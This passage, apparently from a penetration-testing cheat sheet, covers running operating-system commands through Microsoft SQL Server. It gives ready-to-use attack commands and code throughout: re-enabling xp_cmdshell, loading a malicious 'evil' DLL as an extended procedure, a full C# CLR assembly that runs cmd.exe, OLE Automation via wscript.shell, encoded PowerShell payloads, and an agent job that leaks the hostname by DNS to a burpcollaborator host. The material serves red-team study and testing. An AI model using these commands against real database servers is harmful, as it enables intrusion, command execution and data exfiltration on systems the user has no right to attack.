<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="s1">&#39;ping 127.0.0.1&#39;</span><span class="p">;</span>
</code></pre></div></li>
<li>If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;show advanced options&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">;</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">RECONFIGURE</span><span class="p">;</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;xp_cmdshell&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">;</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="n">RECONFIGURE</span><span class="p">;</span>
</code></pre></div></li>
<li>If the procedure was uninstalled
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="n">sp_addextendedproc</span><span class="w"> </span><span class="s1">&#39;xp_cmdshell&#39;</span><span class="p">,</span><span class="s1">&#39;xplog70.dll&#39;</span>
</code></pre></div></li>
</ul>
<h2 id="extended-stored-procedure">Extended Stored Procedure</h2>
<h3 id="add-the-extended-stored-procedure-and-list-extended-stored-procedures">Add the extended stored procedure and list extended stored procedures</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="c"># Create evil DLL</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">Create-SQLFileXpDll</span> <span class="n">-OutFile</span> <span class="n">C</span><span class="p">:\</span><span class="n">temp</span><span class="p">\</span><span class="n">test</span><span class="p">.</span><span class="n">dll</span> <span class="n">-Command</span> <span class="s2">&quot;echo test &gt; c:\temp\test.txt&quot;</span> <span class="n">-ExportName</span> <span class="n">xp_test</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="c"># Load the DLL and call xp_test</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="nb">Get-SQLQuery</span> <span class="n">-UserName</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Query</span> <span class="s2">&quot;sp_addextendedproc &#39;xp_test&#39;, &#39;\\10.10.0.1\temp\test.dll&#39;&quot;</span>
<a id="__codelineno-4-6" name="__codelineno-4-6" href="#__codelineno-4-6"></a><span class="nb">Get-SQLQuery</span> <span class="n">-UserName</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Query</span> <span class="s2">&quot;EXEC xp_test&quot;</span>
<a id="__codelineno-4-7" name="__codelineno-4-7" href="#__codelineno-4-7"></a>
<a id="__codelineno-4-8" name="__codelineno-4-8" href="#__codelineno-4-8"></a><span class="c"># Listing existing</span>
<a id="__codelineno-4-9" name="__codelineno-4-9" href="#__codelineno-4-9"></a><span class="nb">Get-SQLStoredProcedureXP</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Verbose</span>
</code></pre></div>
<ul>
<li>Build a DLL using <a href="https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp">xp_evil_template.cpp</a></li>
<li>Load the DLL
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="c1">-- can also be loaded from UNC path or Webdav</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">sp_addextendedproc</span><span class="w"> </span><span class="s1">&#39;xp_calc&#39;</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;C:\mydll\xp_calc.dll&#39;</span>
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">xp_calc</span>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="n">sp_dropextendedproc</span><span class="w"> </span><span class="s1">&#39;xp_calc&#39;</span>
</code></pre></div></li>
</ul>
<h2 id="clr-assemblies">CLR Assemblies</h2>
<p>Prerequisites:</p>
<ul>
<li>sysadmin privileges</li>
<li>CREATE ASSEMBLY permission (or)</li>
<li>ALTER ASSEMBLY permission (or)</li>
</ul>
<p>The execution takes place with privileges of the <strong>service account</strong>.</p>
<h3 id="execute-commands-using-clr-assembly">Execute commands using CLR assembly</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="c"># Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string</span>
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a><span class="n">Create-SQLFileCLRDll</span> <span class="n">-ProcedureName</span> <span class="s2">&quot;runcmd&quot;</span> <span class="n">-OutFile</span> <span class="n">runcmd</span> <span class="n">-OutDir</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">user</span><span class="p">\</span><span class="n">Desktop</span>
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a>
<a id="__codelineno-6-4" name="__codelineno-6-4" href="#__codelineno-6-4"></a><span class="c"># Execute command using CLR assembly</span>
<a id="__codelineno-6-5" name="__codelineno-6-5" href="#__codelineno-6-5"></a><span class="nb">Invoke-SQLOSCmdCLR</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="p">&lt;</span><span class="n">password</span><span class="p">&gt;</span> <span class="n">-Instance</span> <span class="p">&lt;</span><span class="n">instance</span><span class="p">&gt;</span> <span class="n">-Command</span> <span class="s2">&quot;whoami&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-6-6" name="__codelineno-6-6" href="#__codelineno-6-6"></a><span class="nb">Invoke-SQLOSCmdCLR</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;whoami&quot;</span> <span class="n">Verbose</span>
<a id="__codelineno-6-7" name="__codelineno-6-7" href="#__codelineno-6-7"></a><span class="nb">Invoke-SQLOSCmdCLR</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;powershell -e &lt;base64&gt;&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-6-8" name="__codelineno-6-8" href="#__codelineno-6-8"></a>
<a id="__codelineno-6-9" name="__codelineno-6-9" href="#__codelineno-6-9"></a><span class="c"># List all the stored procedures added using CLR</span>
<a id="__codelineno-6-10" name="__codelineno-6-10" href="#__codelineno-6-10"></a><span class="nb">Get-SQLStoredProcedureCLR</span> <span class="n">-Instance</span> <span class="p">&lt;</span><span class="n">instance</span><span class="p">&gt;</span> <span class="n">-Verbose</span>
</code></pre></div>
<h3 id="manually-creating-a-clr-dll-and-importing-it">Manually creating a CLR DLL and importing it</h3>
<p>Create a C# DLL file with the following content, with the command : <code>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="k">using</span><span class="w"> </span><span class="nn">System</span><span class="p">;</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.Data</span><span class="p">;</span>
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.Data.SqlClient</span><span class="p">;</span>
<a id="__codelineno-7-4" name="__codelineno-7-4" href="#__codelineno-7-4"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.Data.SqlTypes</span><span class="p">;</span>
<a id="__codelineno-7-5" name="__codelineno-7-5" href="#__codelineno-7-5"></a><span class="k">using</span><span class="w"> </span><span class="nn">Microsoft.SqlServer.Server</span><span class="p">;</span>
<a id="__codelineno-7-6" name="__codelineno-7-6" href="#__codelineno-7-6"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.IO</span><span class="p">;</span>
<a id="__codelineno-7-7" name="__codelineno-7-7" href="#__codelineno-7-7"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.Diagnostics</span><span class="p">;</span>
<a id="__codelineno-7-8" name="__codelineno-7-8" href="#__codelineno-7-8"></a><span class="k">using</span><span class="w"> </span><span class="nn">System.Text</span><span class="p">;</span>
<a id="__codelineno-7-9" name="__codelineno-7-9" href="#__codelineno-7-9"></a>
<a id="__codelineno-7-10" name="__codelineno-7-10" href="#__codelineno-7-10"></a><span class="k">public</span><span class="w"> </span><span class="k">partial</span><span class="w"> </span><span class="k">class</span><span class="w"> </span><span class="nc">StoredProcedures</span>
<a id="__codelineno-7-11" name="__codelineno-7-11" href="#__codelineno-7-11"></a><span class="p">{</span>
<a id="__codelineno-7-12" name="__codelineno-7-12" href="#__codelineno-7-12"></a><span class="w"> </span><span class="na">[Microsoft.SqlServer.Server.SqlProcedure]</span>
<a id="__codelineno-7-13" name="__codelineno-7-13" href="#__codelineno-7-13"></a><span class="w"> </span><span class="k">public</span><span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="k">void</span><span class="w"> </span><span class="nf">cmd_exec</span><span class="w"> </span><span class="p">(</span><span class="n">SqlString</span><span class="w"> </span><span class="n">execCommand</span><span class="p">)</span>
<a id="__codelineno-7-14" name="__codelineno-7-14" href="#__codelineno-7-14"></a><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-7-15" name="__codelineno-7-15" href="#__codelineno-7-15"></a><span class="w"> </span><span class="n">Process</span><span class="w"> </span><span class="n">proc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Process</span><span class="p">();</span>
<a id="__codelineno-7-16" name="__codelineno-7-16" href="#__codelineno-7-16"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">FileName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">@&quot;C:\Windows\System32\cmd.exe&quot;</span><span class="p">;</span>
<a id="__codelineno-7-17" name="__codelineno-7-17" href="#__codelineno-7-17"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">Arguments</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">@&quot; /C {0}&quot;</span><span class="p">,</span><span class="w"> </span><span class="n">execCommand</span><span class="p">.</span><span class="n">Value</span><span class="p">);</span>
<a id="__codelineno-7-18" name="__codelineno-7-18" href="#__codelineno-7-18"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">UseShellExecute</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">false</span><span class="p">;</span>
<a id="__codelineno-7-19" name="__codelineno-7-19" href="#__codelineno-7-19"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">RedirectStandardOutput</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">true</span><span class="p">;</span>
<a id="__codelineno-7-20" name="__codelineno-7-20" href="#__codelineno-7-20"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">Start</span><span class="p">();</span>
<a id="__codelineno-7-21" name="__codelineno-7-21" href="#__codelineno-7-21"></a>
<a id="__codelineno-7-22" name="__codelineno-7-22" href="#__codelineno-7-22"></a><span class="w"> </span><span class="c1">// Create the record and specify the metadata for the columns.</span>
<a id="__codelineno-7-23" name="__codelineno-7-23" href="#__codelineno-7-23"></a><span class="w"> </span><span class="n">SqlDataRecord</span><span class="w"> </span><span class="n">record</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">SqlDataRecord</span><span class="p">(</span><span class="k">new</span><span class="w"> </span><span class="n">SqlMetaData</span><span class="p">(</span><span class="s">&quot;output&quot;</span><span class="p">,</span><span class="w"> </span><span class="n">SqlDbType</span><span class="p">.</span><span class="n">NVarChar</span><span class="p">,</span><span class="w"> </span><span class="m">4000</span><span class="p">));</span>
<a id="__codelineno-7-24" name="__codelineno-7-24" href="#__codelineno-7-24"></a>
<a id="__codelineno-7-25" name="__codelineno-7-25" href="#__codelineno-7-25"></a><span class="w"> </span><span class="c1">// Mark the beginning of the result set.</span>
<a id="__codelineno-7-26" name="__codelineno-7-26" href="#__codelineno-7-26"></a><span class="w"> </span><span class="n">SqlContext</span><span class="p">.</span><span class="n">Pipe</span><span class="p">.</span><span class="n">SendResultsStart</span><span class="p">(</span><span class="n">record</span><span class="p">);</span>
<a id="__codelineno-7-27" name="__codelineno-7-27" href="#__codelineno-7-27"></a>
<a id="__codelineno-7-28" name="__codelineno-7-28" href="#__codelineno-7-28"></a><span class="w"> </span><span class="c1">// Set values for each column in the row</span>
<a id="__codelineno-7-29" name="__codelineno-7-29" href="#__codelineno-7-29"></a><span class="w"> </span><span class="n">record</span><span class="p">.</span><span class="n">SetString</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">StandardOutput</span><span class="p">.</span><span class="n">ReadToEnd</span><span class="p">().</span><span class="n">ToString</span><span class="p">());</span>
<a id="__codelineno-7-30" name="__codelineno-7-30" href="#__codelineno-7-30"></a>
<a id="__codelineno-7-31" name="__codelineno-7-31" href="#__codelineno-7-31"></a><span class="w"> </span><span class="c1">// Send the row back to the client.</span>
<a id="__codelineno-7-32" name="__codelineno-7-32" href="#__codelineno-7-32"></a><span class="w"> </span><span class="n">SqlContext</span><span class="p">.</span><span class="n">Pipe</span><span class="p">.</span><span class="n">SendResultsRow</span><span class="p">(</span><span class="n">record</span><span class="p">);</span>
<a id="__codelineno-7-33" name="__codelineno-7-33" href="#__codelineno-7-33"></a>
<a id="__codelineno-7-34" name="__codelineno-7-34" href="#__codelineno-7-34"></a><span class="w"> </span><span class="c1">// Mark the end of the result set.</span>
<a id="__codelineno-7-35" name="__codelineno-7-35" href="#__codelineno-7-35"></a><span class="w"> </span><span class="n">SqlContext</span><span class="p">.</span><span class="n">Pipe</span><span class="p">.</span><span class="n">SendResultsEnd</span><span class="p">();</span>
<a id="__codelineno-7-36" name="__codelineno-7-36" href="#__codelineno-7-36"></a>
<a id="__codelineno-7-37" name="__codelineno-7-37" href="#__codelineno-7-37"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">WaitForExit</span><span class="p">();</span>
<a id="__codelineno-7-38" name="__codelineno-7-38" href="#__codelineno-7-38"></a><span class="w"> </span><span class="n">proc</span><span class="p">.</span><span class="n">Close</span><span class="p">();</span>
<a id="__codelineno-7-39" name="__codelineno-7-39" href="#__codelineno-7-39"></a><span class="w"> </span><span class="p">}</span>
<a id="__codelineno-7-40" name="__codelineno-7-40" href="#__codelineno-7-40"></a><span class="p">};</span>
</code></pre></div>
<p>Then follow these instructions:</p>
<ol>
<li>Enable <code>show advanced options</code> on the server
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;show advanced options&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">;</span><span class="w"> </span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">RECONFIGURE</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="k">GO</span>
</code></pre></div></li>
<li>Enable CLR on the server
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;clr enabled&#39;</span><span class="p">,</span><span class="mi">1</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">RECONFIGURE</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="k">GO</span>
</code></pre></div></li>
<li>Trust the assembly by adding its SHA512 hash
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="w"> </span><span class="k">EXEC</span><span class="w"> </span><span class="n">sys</span><span class="p">.</span><span class="n">sp_add_trusted_assembly</span><span class="w"> </span><span class="mi">0</span><span class="n">x</span><span class="p">[</span><span class="n">SHA512</span><span class="p">],</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;assembly&#39;</span><span class="p">;</span>
</code></pre></div></li>
<li>Import the assembly
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="k">CREATE</span><span class="w"> </span><span class="n">ASSEMBLY</span><span class="w"> </span><span class="n">my_assembly</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="k">FROM</span><span class="w"> </span><span class="s1">&#39;c:\temp\cmd_exec.dll&#39;</span>
<a id="__codelineno-11-3" name="__codelineno-11-3" href="#__codelineno-11-3"></a><span class="k">WITH</span><span class="w"> </span><span class="n">PERMISSION_SET</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">UNSAFE</span><span class="p">;</span>
</code></pre></div></li>
<li>Link the assembly to a stored procedure
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="k">CREATE</span><span class="w"> </span><span class="k">PROCEDURE</span><span class="w"> </span><span class="p">[</span><span class="n">dbo</span><span class="p">].[</span><span class="n">cmd_exec</span><span class="p">]</span><span class="w"> </span><span class="o">@</span><span class="n">execCommand</span><span class="w"> </span><span class="n">NVARCHAR</span><span class="w"> </span><span class="p">(</span><span class="mi">4000</span><span class="p">)</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="k">EXTERNAL</span><span class="w"> </span><span class="n">NAME</span><span class="w"> </span><span class="p">[</span><span class="n">my_assembly</span><span class="p">].[</span><span class="n">StoredProcedures</span><span class="p">].[</span><span class="n">cmd_exec</span><span class="p">];</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="k">GO</span>
</code></pre></div></li>
<li>Execute and clean
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">cmd_exec</span><span class="w"> </span><span class="ss">&quot;whoami&quot;</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="k">DROP</span><span class="w"> </span><span class="k">PROCEDURE</span><span class="w"> </span><span class="n">cmd_exec</span>
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a><span class="k">DROP</span><span class="w"> </span><span class="n">ASSEMBLY</span><span class="w"> </span><span class="n">my_assembly</span>
</code></pre></div></li>
</ol>
<p><strong>CREATE ASSEMBLY</strong> will also accept an hexadecimal string representation of a CLR DLL</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="k">CREATE</span><span class="w"> </span><span class="n">ASSEMBLY</span><span class="w"> </span><span class="p">[</span><span class="n">my_assembly</span><span class="p">]</span><span class="w"> </span><span class="k">AUTHORIZATION</span><span class="w"> </span><span class="p">[</span><span class="n">dbo</span><span class="p">]</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="mi">0</span><span class="n">x4D5A90000300000004000000F</span><span class="p">[</span><span class="n">TRUNCATED</span><span class="p">]</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="k">WITH</span><span class="w"> </span><span class="n">PERMISSION_SET</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">UNSAFE</span><span class="w"> </span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="k">GO</span><span class="w"> </span>
</code></pre></div>
<h2 id="ole-automation">OLE Automation</h2>
<ul>
<li><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Disabled by default</li>
<li>The execution takes place with privileges of the <strong>service account</strong>.</li>
</ul>
<h3 id="execute-commands-using-ole-automation-procedures">Execute commands using OLE automation procedures</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="nb">Invoke-SQLOSCmdOle</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;whoami&quot;</span> <span class="n">Verbose</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="c"># Enable OLE Automation</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="n">EXEC</span> <span class="n">sp_configure</span> <span class="s1">&#39;show advanced options&#39;</span><span class="p">,</span> <span class="n">1</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="n">EXEC</span> <span class="n">sp_configure</span> <span class="n">reconfigure</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="n">EXEC</span> <span class="n">sp_configure</span> <span class="s1">&#39;OLE Automation Procedures&#39;</span><span class="p">,</span> <span class="n">1</span>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="n">EXEC</span> <span class="n">sp_configure</span> <span class="n">reconfigure</span>
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="c"># Execute commands</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a><span class="n">DECLARE</span> <span class="nv">@execmd</span> <span class="n">INT</span>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="n">EXEC</span> <span class="n">SP_OACREATE</span> <span class="s1">&#39;wscript.shell&#39;</span><span class="p">,</span> <span class="nv">@execmd</span> <span class="n">OUTPUT</span>
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a><span class="n">EXEC</span> <span class="n">SP_OAMETHOD</span> <span class="nv">@execmd</span><span class="p">,</span> <span class="s1">&#39;run&#39;</span><span class="p">,</span> <span class="n">null</span><span class="p">,</span> <span class="s1">&#39;%systemroot%\system32\cmd.exe /c&#39;</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="c"># https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="n">python3</span> <span class="n">mssqlclient</span><span class="p">.</span><span class="n">py</span> <span class="s1">&#39;host/username:password@10.10.10.10&#39;</span> <span class="n">-install</span> <span class="n">-clr</span> <span class="n">Microsoft</span><span class="p">.</span><span class="n">SqlServer</span><span class="p">.</span><span class="n">Proxy</span><span class="p">.</span><span class="n">dll</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="n">python3</span> <span class="n">mssqlclient</span><span class="p">.</span><span class="n">py</span> <span class="s1">&#39;host/username:password@10.10.10.10&#39;</span> <span class="n">-check</span> <span class="n">-reciclador</span> <span class="s1">&#39;C:\windows\temp\reciclador.dll&#39;</span>
<a id="__codelineno-17-4" name="__codelineno-17-4" href="#__codelineno-17-4"></a><span class="n">python3</span> <span class="n">mssqlclient</span><span class="p">.</span><span class="n">py</span> <span class="s1">&#39;host/username:password@10.10.10.10&#39;</span> <span class="n">-start</span> <span class="n">-reciclador</span> <span class="s1">&#39;C:\windows\temp\reciclador.dll&#39;</span>
<a id="__codelineno-17-5" name="__codelineno-17-5" href="#__codelineno-17-5"></a><span class="n">SQL</span><span class="p">&gt;</span> <span class="n">enable_ole</span>
<a id="__codelineno-17-6" name="__codelineno-17-6" href="#__codelineno-17-6"></a><span class="n">SQL</span><span class="p">&gt;</span> <span class="n">upload</span> <span class="n">reciclador</span><span class="p">.</span><span class="n">dll</span> <span class="n">C</span><span class="p">:\</span><span class="n">windows</span><span class="p">\</span><span class="n">temp</span><span class="p">\</span><span class="n">reciclador</span><span class="p">.</span><span class="n">dll</span>
</code></pre></div>
<h2 id="agent-jobs">Agent Jobs</h2>
<ul>
<li>The execution takes place with privileges of the <strong>SQL Server Agent service account</strong> if a proxy account is not configured.</li>
<li><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Require <strong>sysadmin</strong> or <strong>SQLAgentUserRole</strong>, <strong>SQLAgentReaderRole</strong>, and <strong>SQLAgentOperatorRole</strong> roles to create a job.</li>
</ul>
<h3 id="execute-commands-through-sql-agent-job-service">Execute commands through SQL Agent Job service</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="nb">Invoke-SQLOSCmdAgentJob</span> <span class="n">-Subsystem</span> <span class="n">PowerShell</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;powershell e &lt;base64encodedscript&gt;&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">Subsystem</span> <span class="n">Options</span><span class="p">:</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="err"></span><span class="n">Subsystem</span> <span class="n">CmdExec</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a><span class="n">-SubSystem</span> <span class="n">PowerShell</span>
<a id="__codelineno-18-5" name="__codelineno-18-5" href="#__codelineno-18-5"></a><span class="err"></span><span class="n">Subsystem</span> <span class="n">VBScript</span>
<a id="__codelineno-18-6" name="__codelineno-18-6" href="#__codelineno-18-6"></a><span class="err"></span><span class="n">Subsystem</span> <span class="n">Jscript</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">USE</span><span class="w"> </span><span class="n">msdb</span><span class="p">;</span><span class="w"> </span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">dbo</span><span class="p">.</span><span class="n">sp_add_job</span><span class="w"> </span><span class="o">@</span><span class="n">job_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_job1&#39;</span><span class="p">;</span><span class="w"> </span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">sp_add_jobstep</span><span class="w"> </span><span class="o">@</span><span class="n">job_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_job1&#39;</span><span class="p">,</span><span class="w"> </span><span class="o">@</span><span class="n">step_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;test_powershell_name1&#39;</span><span class="p">,</span><span class="w"> </span><span class="o">@</span><span class="n">subsystem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;PowerShell&#39;</span><span class="p">,</span><span class="w"> </span><span class="o">@</span><span class="n">command</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">N</span><span class="s1">&#39;$name=$env:COMPUTERNAME[10];nslookup &quot;$name.redacted.burpcollaborator.net&quot;&#39;</span><span class="p">,</span><span class="w"> </span><span class="o">@</span><span class="n">retry_attempts</span><span class="w"> </span><span 